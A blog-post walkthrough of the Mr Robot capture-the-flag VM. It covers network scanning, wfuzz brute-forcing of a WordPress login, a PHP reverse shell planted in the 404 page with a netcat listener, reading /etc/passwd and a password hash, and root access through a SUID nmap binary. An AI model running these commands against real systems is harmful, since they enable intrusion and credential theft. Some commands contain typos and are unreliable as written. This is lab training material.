Open in app

Sign in

Write

Sign in

Mr Robot — A vulnerable VM Story.

Pete
SecurityBytes
Published in
6 min readJul 25, 2016

I’m a security analyst. Sometimes my work leads me to spend less time doing analysis of security than I’d like, when this occurs I always try drag myself back into a technical area. Between myself and a ‘like minded individual’ we decided to test our mettle against some vulnerable virtual machines. Every single time I do stuff like this I realise how little I know.

Mr Robot was the VM we plumped for, using the tried and tested, it was at the top of the list (at the time). “What list!?” I don’t here you cry because I currently only have one follower and that happens to be the fella I worked with on this VM. As however, I am a benevolent blogger and shall consider future readers of this; vulnhub is where this badger originated. For the pedantic/lazy of you; MrRobot

Right, anyway. I launched it in VMWare player and it looks like this:

Fancy Eh?

So step one done.

Step two find the machine on the local network. I launched my Kali VM (for those that are interested, I completed this VM using Kali/MrRobot sat on top of Ubuntu). From Kali, as both machines were set up as HOST ONLY, I ignored the use of NMAP, too slow!

ifconfig

to ID my IP then;

arp-scan -l

This is basically an arpscan across the local network and returns results of devices in about 2 seconds.

root@kali:/usr/share/wordlists# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.240.1 00:50:56:c0:00:01 VMware, Inc.
192.168.240.129 00:0c:29:95:a7:ff VMware, Inc.
192.168.240.254 00:50:56:ff:e4:26 VMware, Inc.5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.107 seconds (121.50 hosts/sec). 3 responded

There it is in the middle 240.129 (mine was 128) so that’s what I’ll be targeting for the remainder of the write-up.

Now I deployed nmap

root@kali:/usr/share/wordlists# nmap -sV 192.168.240.129 -p 1–65335Starting Nmap 7.12 ( https://nmap.org ) at 2016–06–28 12:01 BST
Nmap scan report for 192.168.240.129
Host is up (0.00047s latency).
Not shown: 65332 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
MAC Address: 00:0C:29:95:A7:FF (VMware)

The switches are

  • -sV :Service Version
  • -p : Port (nmap will default to 1000 ports unless you tell it otherwise).

So we can see there are two web service open and one closed ssh port. It’s a fair guess that this is going to be a web exploit based challenge.

Firing up IceWeasel and taking a look at the site gives us a pseudo-terminal based around the Mr Robot TV show.

It’s very flashy, but digging around didn’t really lead me anywhere.

Firing up Burpsuite and spidering the site instantly showed me the following:

It’s wordpress! and where there is Wordpress there is a Wordpress logon (/wp-login.php). However at this stage I have zero information to work on. Casting my eye quickly across the spider results shows /robots.txt

Browsing to this gives:

User-agent: *
fsocity.dic
key-1-of-3.txt

Key 1:
073403c8a58a1f80d943455fb30724b9

Smells like an MD5, it doesn’t exist in any pre-cracked lists I could find and I assumed the VM didn’t require you to brute force it, so it got squirreled away for later.

fsociety.dic is a dictionary of about 800k words. A quick

cat fsociety.dic | sort | uniq > fsoc.dic

reduced this to 11k. Much more manageable.

Next I tried to use Burp intruder to use the dictionary for brute forcing purposes. However Intruder on the free version of Burp is an absolute shower of shite. As such I fired up wfuzz.

The interesting this about the wordpress login was you get a different error depending on which boxes are filled out.

If your user name is wrong the response contains Invalid

If your password is wrong it contains incorrect

Starting with the user name

wfuzz -c -z file,/root/Documents/MrRobot/fsoc.dic — hs Invalid -d “log=FUZZ&pwd=aaaaa” http://192.168.240.129/wo-login.php

Which is:

  • -c : Colourful
  • -z : payload/wordlist
  • — hs : ignore response containing Invalid
  • -d : the post request
  • FUZZ : the section of the post I want to fuzz

All this gave me the following user names:

ELIOTT, eliott and Eliott

So using this we then repeat the fuzzing on the password field

wfuzz -c -z file,/root/Documents/MrRobot/fsoc.dic — hs incorrect -d “log=eliott&pwd=FUZZ” http://192.168.240.129/wo-login.php

Which gives us:

ER28–0652

Using this I was able to log in to the Wordpress console.

Once into the console things got a bit simpler. I wanted a reverse shell and the easiest way to achieve this was just to edit the 404 page to be the reverse shell.

The shell itself was just copy pasta from:

/usr/share/webshells/php/php-reverse-shell.php

with the relevant IP addresses changed.

With this uploaded I could now go to any ‘page’ to launch my shell.

root@kali:~# nc -nvlp 443

Using the above netcat command to invoke a listener:

  • -n : numeric IP/No DNS
  • -v : Verbose
  • -l: Listen
  • -p: port

I browsed to a page that doesn’t exist. This gives us a limited shell. It’s a bit rubbish though as it’s not a ‘proper shell’.

To break out of the ‘Jail shell’ we can use python

python ‘import pty;pty.spawn(“/bin/bash”)’ > /tmp/shell.pypython /tmp/shell.py

Now we have a real shell, ‘whoami’ reveals we are ‘daemon’.

cat /etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false
bitnamiftp:x:1000:1000::/opt/bitnami/apps:/bin/bitnami_ftp_false
mysql:x:1001:1001::/home/mysql:
varnish:x:999:999::/home/varnish:
robot:x:1002:1002::/home/robot:

robot looks interesting:

cd /home/robotls -lrt

gives:

key-2-of-3.txtpassword.raw-md5

Key 2: not the correct permissions

$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

this decodes to:

abcdefghijklmnopqrstuvwxyz

Now we have the password for robot we can su to robot and grab the second key

Key 2:

822c73956184f694993bede3eb39f959

I then ran the following three commands and review the output:

robot@linux:~$ find / -perm -1000 -type d 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
/run/shm
/run/lock
/var/spool/cron/crontabs
/var/tmp
/tmp
/tmp/.ICE-unix
/tmp/.X11-unixrobot@linux:~$ find / -perm -g=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
/usr/bin/mail-touchlock
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/crontab
/usr/bin/chage
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/ssh-agent
/usr/bin/wall
/sbin/unix_chkpwd

robot@linux:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

The result that stuck out to me was:

/usr/local/bin/nmap

due to it’s location on the drive it seemed out of place. Sure enough a bit of Google-Fu later taught me that nmap has an undocumented — interactive mode which will adopt the permissions of it’s owner, which in this case was root.

cd /root/# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Game Over.

Caveats to this write up. I have written how I completed the challenge. Not all the methods I tried in my attempts to crack this. Here is a list of things I also played with along the way that led to nothing

  • WPSCAN, I spent a lot of time trying to do a database dump from the all-in-one-seo-pack plugin.
  • Kernel version, there is a vuln in the kernel for a race condition allowing arbitrary reading of files. Spent some time considering if this could be used to dump /etc/shadow
  • Apport 2.14.1 on Ubuntu 14.04 has a Local root exploit, I’ll freely admit to spending a while with this before i realised certain things where not installed and this VM wasn’t vulnerable to this.
  • nmap, although this eventually turned out to be the way in I spent quite a long time trying to use it in some ‘environmental’ capacity (symbolic links etc). Clearly that didn’t work.

EDITS: Formatting/Timeline/Words!

Linux
Vulnerable
Hacking
Kali
Vulnerable Vm

--

--

Pete
SecurityBytes

Written by Pete

596 Followers
Editor for

InfoSec architect, analyst and researcher. Suffering from full time imposter syndrome.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams